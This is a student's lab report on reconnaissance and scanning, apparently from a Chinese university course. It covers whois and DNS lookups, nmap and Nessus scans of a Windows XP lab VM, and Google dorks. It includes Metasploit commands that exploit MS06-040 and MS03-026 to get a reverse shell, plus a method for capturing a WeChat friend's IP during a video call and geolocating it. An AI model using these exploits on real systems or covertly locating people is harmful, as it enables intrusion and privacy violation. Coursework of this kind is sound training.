1.实验内容
实验具体内容:
一、从www.besti.edu.cn、baidu.com、sina.com.cn中选择一个DNS域名进行查询,获取如下信息:
DNS注册人及联系方式
该域名对应IP地址
IP地址注册人及联系方式
IP地址所在国家、城市和具体地理位置
PS:使用whois
dig
nslookup
traceroute
以及各类在线和离线工具进行搜集信息(要求必须用WHOIS、dig、nslookup、traceroute、tracert以及在线工具)
二、尝试获取BBS、论坛、QQ、MSN中某一好友的IP地址,并查询获取该好友所在的具体地理位置。
三、使用nmap开源软件对靶机环境进行扫描,回答以下问题并给出操作命令。
-
靶机IP地址是否活跃
nmap -sn <target IP>
-
靶机开放了哪些TCP和UDP端口
nmap -sT -sU <target IP>
-
靶机安装了什么操作系统,版本是多少
nmap -O <target IP>
-
靶机上安装了哪些服务
nmap -sV <target IP>
四、使用Nessus开源软件对靶机环境进行扫描,回答以下问题并给出操作命令。
-
靶机上开放了哪些端口
-
靶机各个端口上网络服务存在哪些安全漏洞
-
你认为如何攻陷靶机环境,以获得系统访问权
五、通过搜索引擎搜索自己在网上的足迹,并确认自己是否有隐私和信息泄漏问题。并练习使用Google hack搜集技能完成搜索
学习基础知识内容:
网络踩点方面:Google hack搜集技能的学习、DNS域名解析、网络流量跟踪、地理位置查询等等
网络扫描方面:namp的命令学习、漏洞扫描的学习
2.实验过程
一、从www.besti.edu.cn、baidu.com、sina.com.cn中选择一个DNS域名进行查询
命令的基础学习:
-
whois
查询域名或IP地址的注册信息。提供关于域名的所有者、联系人、注册商、注册日期、过期日期等详细信息。 -
dig
查询DNS记录,包括A记录(IP地址)、MX记录(邮件服务器)、CNAME记录(别名)等。提供详细的DNS解析信息。 -
nslookup
查询DNS记录,类似于 dig,但通常更简洁。 -
traceroute
跟踪数据包从源主机到目标主机经过的路径。显示每跳的时间延迟,帮助诊断网络连接问题。 -
tracert
与traceroute
同作用,只是应用与windows系统。
(1)选择baidu.com
进行查询。查询DNS注册人及联系方式,利用whois baidu.com
命令
【注册人(Registrant)】
- DNS注册人:MarkMonitor Inc.
- 联系方式————邮箱:abusecomplaints@markmonitor.com
- 联系方式————电话:+1.2086851750
(2)查询baidu.com
该域名对应IP地址,利用nslookup baidu.com
命令和dig baidu.com
【从两种查询方式都可以看出,有两个IP地址:39.156.66.10
110.242.68.66
】
(3)查询IP地址注册人及联系方式 利用whois 39.156.66.10
和 whois 110.242.68.66
IP注册人:haijun li
联系方式————邮箱:hostmaster@chinamobile.com
联系方式————电话号码:+86 1052686688
IP地址的具体地址:29,Jinrong Ave, Xicheng district,beijing,100032 【北京西城区金融大街29号】
【注册人1】
IP注册人:ChinaUnicom Hostmaster
联系方式————邮箱:hqs-ipabuse@chinaunicom.cn
联系方式————电话号码:+86-10-66259764
【注册人2】
IP注册人:Kong Lingfei
联系方式————邮箱:konglf5@chinaunicom.cn
联系方式————电话号码:+86-311-86681601
(4)查询IP地址所在国家、城市和具体地理位置 利用geoiplookup
【具体地址其实在(3)输出的信息里也可以看到,这里主要是想利用一些其他一些在线工具】
【工具(1)网址:https://q.ip5.me/】
【工具(2)网址:https://uutool.cn/ip/】
(5)利用traceroute baidu.com
和tracert baidu.com
来查看从源主机到目标主机经过的路径。
【在kali中】
【在Windows主机中】
【一般可以分析出IP地址,以及网关地址等等,一般可进行路由追踪】
二、尝试获取微信中一好友的IP地址,并查询获取该好友所在的具体地理位置。
(1)打开一个资源管理器,在电脑上与【微信】好友打一个视频电话(为了在资源监视器中判断哪个是她,发送的信号最多的),在资源管理器中找到好友的IP地址。
(2)在线工具【https://uutool.cn/ip/】上查看好友IP所在地
(3)在线工具【https://chaipip.com/】上查看好友IP所在地(有地图)
【不过有一个问题,可能就是区域可能不太精确,显示在未央区,但其实好友没在这个区】
三、使用nmap开源软件对靶机环境进行扫描
尝试扫描前期准备工作:靶机使用了之前实验的靶机 windows XP 查看IP地址192.168.85.152
如下:
(1)查看靶机IP地址是否活跃 nmap -sn 192.168.85.152
【可以看到,靶机是活跃的,也就是是开机的】
(2)查看靶机开放了哪些TCP和UDP端口 nmap -sT -sU 192.168.85.152
【可以看到一堆 TCP 端口和 UDP 端口】
(3)查看靶机安装了什么操作系统,版本是多少 nmap -O 192.168.85.152
操作系统及版本:Microsoft Windows 2000|XP
【还可以看出他是在vmvare的虚拟机】
(4)查看靶机上安装了哪些服务 nmap -sV 192.168.85.152
四、使用Nessus开源软件对靶机环境进行扫描
目前最为著名的漏洞扫描软件——Nessus
(1)在官网下载 Nessus 后,通过Xftp8将其压缩包传入kali中,然后通过dpkg -i Nessus-10.8.3-debian10_amd64.deb
指令来解压。
【解压完的提示信息可以知道:启动 Nessus 的命令,以及进行扫描的网址https://wangrong:8834/】
(2)解压之后,通过systemctl start nessusd
来启动其服务,并通过sudo netstat -tuln | grep 8834
来查看其服务状态。【8834是nessus默认的端口号】
【服务已经启动成功】
(3)在kali的浏览器中打开https://wangrong:8834/
这个网址,先安装,再进行正式的扫描。
【安装 1 选择Advanced】
【安装 2 选择accept...
Continue
Register...
然后输入个人信息 】
【安装 3 创建账号 】
【安装 4 创建完粘好后,会进入的这里,但是还不能直接用,需要等一会儿 】
【安装 5 显示如下图的内容之后,就说明安装完毕,可以使用 】
(4)安装完之后,就可以进行扫描了。
靶机是windows XP IP地址:192.168.85.152
- 靶机上开放了哪些端口【通过
+ new scan
来新建一个扫描,选择主机发现即 Host Disvovery】输入靶机IP地址192.168.85.152
【可以看到开放了的端口是 135
139
445
1025
1026
】
- 靶机各个端口上网络服务存在哪些安全漏洞 【通过
+ new scan
来新建一个扫描,选择高级扫描】输入靶机IP地址192.168.85.152
【下图中可以看出,有24个vulnerablities,其中包括超危漏洞和高危漏洞】
【其中包括以下漏洞(还有很多,这只是其中一些比较严重的)】
————————————————————————————————————————————————————————————————
MS06-040: Server Service 缓冲区溢出
MS03-043: Messenger Service 缓冲区溢出
MS09-001: NetAPI32.dll 缓冲区溢出
MS03-026: RPC 接口缓冲区溢出
MS05-027: Windows Movie Maker 缓冲区溢出
MS03-039: Microsoft Data Access Components (MDAC) 缓冲区溢出
MS04-012: Microsoft Data Access Components (MDAC) 缓冲区溢出
MS04-011: Windows Movie Maker 缓冲区溢出
MS08-067: Server Service 远程代码执行漏洞
MS04-007: Windows Shell 缓冲区溢出
MS04-022: Windows Shell 缓冲区溢出
————————————————————————————————————————————————————————————————
- 你认为如何攻陷靶机环境,以获得系统访问权
利用上述漏洞中的MS06-040
和MS03-026
进行攻击,两个可以获得系统访问权,得到一个 shell.
使用 Metasploit 框架中的相关模块来执行攻击,对于两个漏洞,分别加载相应的 Metasploit 模块,设置目标 IP 地址、端口、Payload 和监听器。
【MS06-040】
use exploit/windows/smb/ms06_040_netapi
set RHOST 192.168.85.152
set RPORT 445
set PAYLOAD windows/shell_reverse_tcp
set LHOST 192.168.85.151
set LPORT 4444
exploit
【MS03-026】
use exploit/windows/dcerpc/ms03_026_dcom
set RHOST 192.168.85.152
set RPORT 135
set PAYLOAD windows/shell_reverse_tcp
set LHOST 192.168.85.151
set LPORT 4444
exploit
然后到另一个终端中连接监听即可。
五、通过搜索引擎搜索自己在网上的足迹,确认自己是否有隐私和信息泄漏问题,并练习使用Google hack搜集技能完成搜索
(1)通过在搜索引擎上直接搜索自己的姓名、学号、手机号网上发现自己的足迹,并确认自己是否有隐私和信息泄漏问题。
【搜索1:姓名搜索】
【搜到了很多同名同姓人的信息,但是没有我的哦~】
【搜索2:学号搜索】
【看到了一些在博客园上发的博客实验报告,就没有了】
【搜索3:学号+姓名 搜索】
【还是博客园的一些博客】
(2)练习使用Google hack搜集技能完成搜索(至少10种搜索方法)
Google hack
intitle: 从网页标题中搜索指定的关键字,可专门用来搜索指定版本名称的各类web程序,也可用allintitle(二级标题)
inurl:从url中搜索指定的关键字,可专门用来构造各种形式的漏洞url,也可用allinurl(二级)
intext:从网页中搜索指定的关键字,可专门用它来穿透到漏洞页面等……也可用allintext
filetype: 搜索指定的文件后缀,例如:sql mdb txt bak backup ini zip rar doc xls……
site:在某个特定的网站内中搜索指定的内容
link:搜索和该链接有关联连接,比如:友情链接
index of: 找目录遍历会用到
- 【搜索1】
intitle:password
查找所有包含“password”字样的标题的页面
- 【搜索2】
intext:"404 Not Found"
查找包含“404 Not Found”文本的网页
- 【搜索3】
filetype:pdf
查找pdf文件的内容。
- 【搜索4】
inurl:https://www.besti.edu.cn/ filetype:pdf
查询从北京电子科技学院的官方网站(https://www.besti.edu.cn/)上找到所有以PDF格式发布的文档。
- 【搜索5】
filetype:doc site:baidu.com
搜索在百度网站上找到的 .doc 或 .docx 文件。
- 【搜索6】
site:http://www.besti.edu.cn intext:"网络空间"
在 http://www.besti.edu.cn 网站上内容中包含“网络空间”这个短语的网页。
- 【搜索7】
.filetype:pdf "北京电子科技学院"
:查询包含“北京电子科技学院”这个完整短语的文件
- 【搜索8】
inurl:login site:besti.edu.cn
北京电子科技学院网站上所有 URL 中包含 login 的页面.
- 【搜索9】
related:besti.edu.cn
查找与besti.edu.cn类似的网站。
- 【搜索10】
link:https://www.besti.edu.cn/ site:baidu.com
在百度网站(baidu.com)上链接到北京电子科技学院官方网站 https://www.besti.edu.cn/ 的页面。
3.问题及解决方案
- 问题1:解压 Nessus 压缩包时遇到问题
- 问题1解决方案:权限不够,切换到root用户即可。
4.学习感悟、思考等
通过本次信息搜集技术实践,我深刻体会到了网络信息搜集的多样性和复杂性。首先,我选择了baidu.com作为DNS域名进行查询。使用WHOIS工具,我获取了该域名的注册人及联系方式,并通过dig和nslookup工具查询到了该域名对应的IP地址。进一步使用WHOIS查询IP地址,找到了IP地址的注册人及联系方式,并通过在线工具确定了IP地址所在的国家、城市和具体地理位置。接着,我尝试获取微信中一好友的IP地址,使用在线地理定位服务确定了该好友的具体地理位置。在对靶机环境进行扫描时,我使用了nmap开源软件,通过许多命令来确定靶机的一些信息。随后,我使用Nessus开源软件对靶机进行了更详细的扫描,获取了靶机上开放的端口及其网络服务存在的安全漏洞,并基于这些信息提出了攻陷靶机环境以获得系统访问权的可能方法。最后,我通过搜索引擎搜索了自己的网上足迹,并练习了使用Google hack搜集技能,掌握了多种高级搜索方法,如 filetype:pdf site:besti.edu.cn、intext:"网络空间" site:besti.edu.cn、inurl:login site:besti.edu.cn 等,这不仅提升了我的信息搜集能力,也增强了我对网络安全和个人隐私保护的意识。整个实验过程中,我不仅学会了如何高效地获取和分析网络信息,还深刻理解了信息搜集技术在实际应用中的重要性和实用性。
参考资料
标签:cn,edu,2024,2025,20222326,搜索,IP地址,靶机,com
From: https://www.cnblogs.com/20222326wangRong/p/18568913